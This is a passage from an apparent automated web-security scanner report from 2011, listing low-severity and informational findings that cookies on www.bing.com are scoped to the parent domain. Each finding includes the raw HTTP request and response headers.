<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

2.3. http://www.bing.com/travel/deals/weekend-deals-flight-deals.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/deals/weekend-deals-flight-deals.do

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/deals/weekend-deals-flight-deals.do HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: lbc=8; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-2n3vc7stv0gusyz5ai187p3t99ue_VID-2rvgvj2qaejf8yz78uik5p44jda5_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:26 GMT; Path=/travel
Set-Cookie: JSESSIONID=D94BD82022034E3E99FAD80B6425BC45; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:27 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=7EF6DBEDCE444E9D9CD7ABFBFF0883A1; domain=.bing.com; path=/
Content-Length: 116517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...

2.4. http://www.bing.com/travel/destinations/las-vegas-nevada-4-stars-hotels-hostels-motels-1003502

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/destinations/las-vegas-nevada-4-stars-hotels-hostels-motels-1003502

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/destinations/las-vegas-nevada-4-stars-hotels-hostels-motels-1003502 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private, max-age=0
Content-Length: 0
Content-Language: en-US
Location: http://www.bing.com/travel/destinations/las-vegas-nevada-trips-1003502
Date: Fri, 11 Feb 2011 21:46:19 GMT
Connection: close
Set-Cookie: lbc=18; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z7s38rpfkercl2yz74rb2hu9cnuco_VID-z1n8ppi7nv5f10yz79ofvl7lheql4_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:19 GMT; Path=/travel
Set-Cookie: JSESSIONID=B5BCC216FD00F37E72162E209E5DC133; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:19 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460779; domain=.bing.com; path=/
Set-Cookie: _SS=SID=998AC92DF8DE4176A8D10B5E59C5D155; domain=.bing.com; path=/


2.5. http://www.bing.com/travel/destinations/orlando-florida-hotels-hostels-motels-1004643

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/destinations/orlando-florida-hotels-hostels-motels-1004643

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/destinations/orlando-florida-hotels-hostels-motels-1004643 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private, max-age=0
Content-Length: 0
Content-Language: en-US
Location: http://www.bing.com/travel/destinations/orlando-florida-trips-1004643
Date: Fri, 11 Feb 2011 21:46:20 GMT
Connection: close
Set-Cookie: lbc=914; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z4gavb6tgt9cj3yz537ou28tfef9i_VID-3hj6nr643agpayz6dbfcgvh3fvaj_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:20 GMT; Path=/travel
Set-Cookie: JSESSIONID=E95235E963A2DF8E29889E5BBD935FF3; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:20 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460780; domain=.bing.com; path=/
Set-Cookie: _SS=SID=8C47D5A8725040C1BB26FE4119092907; domain=.bing.com; path=/


2.6. http://www.bing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:49 GMT
Content-Length: 27957
Connection: close
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:49 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=D112E558C1254059A8053EF8937619A6; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...

2.7. http://www.bing.com/browse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /browse

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browse HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:54 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=F3588EE7150F4A06A38A556D2979D3C1; domain=.bing.com; path=/
Content-Length: 39120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

2.8. http://www.bing.com/events/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /events/search

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:48 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=48D2324963F04E158870DD7D33820F4D; domain=.bing.com; path=/
Content-Length: 68849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

2.9. http://www.bing.com/images/results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /images/results.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: IMGSCHUSR=scratchpad=0&details=1&BE=1; expires=Sun, 10-Feb-2013 21:43:52 GMT; domain=.bing.com; path=/images
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:52 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=62FB203ABE6B4340BB2B5B957921B4A1; domain=.bing.com; path=/
Content-Length: 61264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta
...[SNIP]...

2.10. http://www.bing.com/local

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _HOP=; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://www.bing.com:80/local/
X-BM-TraceID: c2fe4ba620f6480b9d5cb06a42abadfc
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001211
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:37:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _HOP=I=1&TS=1297463871; domain=.bing.com; path=/
Content-Length: 146

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.bing.com:80/local/">here</a>.</h2>
</body></html>

2.11. http://www.bing.com/local/ypdefault.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/ypdefault.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /local/ypdefault.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 23:45:17 GMT
Last-Modified: Fri, 11 Feb 2011 21:45:17 GMT
X-BM-TraceID: 5c0f1f0c56bc48fb8aa37c02cfb76fa8
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001212
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:45:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BID=105e87fa5505430dba31d5b25b248b42; path=/local
Set-Cookie: CID=84ab2256db4b4410ac7cbfab5b9a7934; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: CDate=2/11/2011 9:45:17 PM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:17 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=63F5F83330384CD78E309DFEE65F3927; domain=.bing.com; path=/
Content-Length: 55438


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.live
...[SNIP]...

2.12. http://www.bing.com/maps/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 1a0e5b1d2d614a5a8935caa2c2a373d3
X-Ve-Server: BL2-01206-20110127.750-0
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001206
Date: Fri, 11 Feb 2011 21:44:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:28 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=8E0811106C0646379A276C208363964B; domain=.bing.com; path=/
Content-Length: 116852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...

2.13. http://www.bing.com/maps/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/default.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/default.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: c821dd5956474cc8a14cb3f28f6175f4
X-Ve-Server: BL2-01212-20110127.750-0
X-UA-Compatible: IE=7
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001212
Date: Fri, 11 Feb 2011 21:44:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:50 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=C6FB3C601612431EA0824421BAC3CD04; domain=.bing.com; path=/
Content-Length: 116900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:v
...[SNIP]...

2.14. http://www.bing.com/maps/explore/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /maps/explore/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps/explore/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-Ve-Server: 01208
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001208
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:45:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: slpreview=1; path=/maps
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:13 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=ECF2B380802E49969DD2EADFA4502597; domain=.bing.com; path=/
Content-Length: 43179


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta content="text/
...[SNIP]...

2.15. http://www.bing.com/news/results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/results.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: /news
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Fri, 11 Feb 2011 21:44:27 GMT
Connection: close
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:27 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460667; domain=.bing.com; path=/
Set-Cookie: _SS=SID=29DA2FA1DA7F4552877E610D60E8B949; domain=.bing.com; path=/


2.16. http://www.bing.com/news/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /news/search

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: /news
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Fri, 11 Feb 2011 21:44:27 GMT
Connection: close
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:27 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460667; domain=.bing.com; path=/
Set-Cookie: _SS=SID=5112D7B54309486995D17B4B2D97CE76; domain=.bing.com; path=/


2.17. http://www.bing.com/results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /results.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/search
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Fri, 11 Feb 2011 21:43:50 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1297460630; domain=.bing.com; path=/


2.18. http://www.bing.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /search

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /?scope=web&mkt=en-US
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
